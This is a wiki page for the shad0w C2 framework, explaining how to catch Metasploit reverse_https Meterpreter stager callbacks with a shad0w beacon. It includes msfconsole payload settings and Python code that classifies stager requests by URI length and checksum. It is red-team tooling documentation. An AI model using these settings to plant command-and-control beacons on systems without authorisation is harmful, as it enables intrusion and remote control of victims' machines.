
Catching Meterpreter Callbacks

Lee Baird edited this page Jan 7, 2021 · 3 revisions

Instead of rewriting every Metasploit exploit and auxiliary module, I figured the saner option would be to add support for Metasploit's stagers. The shad0w C2 answers the Meterpreter stager's callback with a shad0w beacon instead of Meterpreter, so any Metasploit module that delivers a stager can be used as-is. Doing this only requires a couple of extra steps.

1. Make sure the `LHOST` and `LPORT` options point at the shad0w C2 listener, not at a Metasploit handler.
2. Disable the default Metasploit payload handler, so msfconsole does not try to catch the callback itself.
3. Set the exit function to `none`.
4. Set `StagerURILength`. This is how the C2 identifies a Meterpreter stager callback: the stager requests a URI of exactly this length. It can be set to any value, but you must remember it, because shad0w has to be told the same number.
5. A shad0w beacon can only be staged over `reverse_https` stagers, so the payload must be one of these.

```
msf6 > set DisablePayloadHandler true
msf6 > set EXITFUNC none
msf6 > set StagerURILength 1337
msf6 > set payload windows/x64/meterpreter/reverse_https
```

6. Set the `MsfUriSize` variable in shad0w to the same value as `StagerURILength` in Metasploit.

```
shad0w ≫ set -v MsfUriSize -d 1337
```

When the Metasploit module is run and the exploit succeeds, you will receive a shad0w beacon instead of a Meterpreter session.
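To make the matching step above concrete, here is an added example (not shad0w's or Metasploit's code) of the decision an HTTPS listener has to make for every incoming GET: treat the request as the reverse_https stager's first callback and serve the beacon, or treat it as ordinary traffic. It models the length check the steps describe, and adds the second check Metasploit's own HTTP handler performs, an 8-bit checksum over the URI that equals 92 (`URI_CHECKSUM_INITW`) for the initial Windows stager request. The URI generator mirrors how Metasploit produces a fixed-length URI with that checksum so the example can be run offline against constructed request paths. Whether shad0w's `MsfUriSize` counts the leading `/` is an assumption made here; the function names and the `"msf-stager"`/`"other"` labels are this example's, not the project's.

```python
import secrets
import string

# Metasploit's checksum value for the initial Windows stager request
# (Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW).
URI_CHECKSUM_INITW = 92
# base64url alphabet used for Metasploit's generated stager URIs
URI_CHARS = string.ascii_letters + string.digits + "_-"


def checksum8(s: str) -> int:
    """Rex::Text.checksum8: sum of the byte values, modulo 256."""
    return sum(s.encode("ascii")) % 0x100


def generate_stager_uri(length: int, target_sum: int = URI_CHECKSUM_INITW) -> str:
    """Return a random URI of exactly `length` base64url characters whose
    checksum8 equals `target_sum`: what a reverse_https stager built with
    StagerURILength=`length` will GET. Modelled on Metasploit's
    generate_uri_checksum (not its code); the last character is chosen to
    land the sum on the target, retrying when no alphabet character fits."""
    if length < 2:
        raise ValueError("need at least two characters to fix the checksum")
    while True:
        body = "".join(secrets.choice(URI_CHARS) for _ in range(length - 1))
        need = (target_sum - checksum8(body)) % 0x100
        if chr(need) in URI_CHARS:
            return body + chr(need)


def classify_request(path: str, msf_uri_size: int) -> str:
    """Decide what to serve for a GET on `path`.

    'msf-stager': looks like the first reverse_https stager request (URI length
                  equals MsfUriSize and the Metasploit init checksum is valid),
                  so the listener should hand back a shad0w beacon.
    'other':      anything else (normal beacon traffic, scanners, typos).
    """
    # Assumption: MsfUriSize counts the path without the leading "/" or query.
    uri = path.split("?", 1)[0].lstrip("/")
    if len(uri) != msf_uri_size:          # the check the wiki steps describe
        return "other"
    # Extra check a C2 gets for free: Metasploit strips non-base64url characters
    # and expects checksum8 == 92 for the initial Windows stager request, so a
    # request of the right length but the wrong checksum is not a stager.
    bare = "".join(c for c in uri if c in URI_CHARS)
    if checksum8(bare) != URI_CHECKSUM_INITW:
        return "other"
    return "msf-stager"


if __name__ == "__main__":
    MSF_URI_SIZE = 1337                  # the value given to `set -v MsfUriSize -d 1337`
    stager_uri = generate_stager_uri(MSF_URI_SIZE)
    broken = stager_uri[:-1] + ("x" if stager_uri[-1] != "x" else "y")
    sample_paths = [                     # constructed sample request paths
        "/" + stager_uri,                # what the reverse_https stager sends
        "/" + broken,                    # right length, checksum no longer 92
        "/" + stager_uri[:-1],           # off-by-one length (MsfUriSize mismatch)
        "/api/v1/tasks",                 # ordinary beacon traffic
    ]
    for p in sample_paths:
        print(f"{classify_request(p, MSF_URI_SIZE):>10}  len={len(p) - 1:5d}  {p[:24]}...")
```

The length check alone is what the steps rely on, and it is enough as long as nothing else on the listener uses a URI of that length; the checksum check costs nothing and stops a coincidental same-length request from being served the beacon.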

(Screenshot: run_exploit)

(Screenshot: listener)
